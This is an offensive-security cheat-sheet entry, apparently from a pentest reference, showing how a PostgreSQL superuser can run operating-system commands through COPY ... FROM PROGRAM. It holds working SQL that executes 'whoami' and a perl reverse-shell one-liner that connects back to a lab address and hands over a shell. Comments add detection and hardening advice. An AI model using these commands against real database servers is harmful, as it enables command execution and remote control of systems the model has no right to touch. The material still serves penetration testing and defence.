Database Services

PostgreSQL

Local Privilege Escalation >= v9.3

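  • Execute OS commands as the operating-system account that runs the PostgreSQL server (typically `postgres`). `COPY ... FROM PROGRAM` is restricted to database superusers and, since PostgreSQL 11, members of the `pg_execute_server_program` role, so this technique requires a database login that is already highly privileged.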

psql -U postgres
\c postgres
-- The session above connects as the "postgres" role (a superuser in default
-- installs) and switches to the "postgres" database.
-- Scratch table that receives the command's output; any copy left by an
-- earlier run is dropped first. Nothing below drops it afterwards, so a
-- leftover table named cmd_exec is an artifact worth looking for in a review.
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
-- COPY ... FROM PROGRAM makes the server run the quoted command through the
-- shell, as the OS account the server runs as, and loads its stdout into
-- cmd_exec. Hardening: keep superuser and pg_execute_server_program membership
-- to a minimum, and alert on COPY ... PROGRAM in the statement logs.
COPY cmd_exec FROM PROGRAM 'whoami';
-- Read the captured output back.
SELECT * FROM cmd_exec;

# Reverse shell: start a listener on the receiving host before running the statement below.
-- Same COPY ... FROM PROGRAM primitive as above, with a perl one-liner as the
-- program: it forks, the parent exits, and the child opens a TCP connection to
-- the PeerAddr value (a lab address here), attaches its standard input and
-- output to that socket, and passes each line it reads to system().
-- The doubled single quotes ('') are SQL escaping for a quote inside the
-- string literal.
-- Detection: the PostgreSQL server process spawning sh/perl and a database
-- host opening outbound connections are both strong signals; egress filtering
-- on database hosts limits what such a child process can reach.
COPY cmd_exec FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.14.52:4446");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
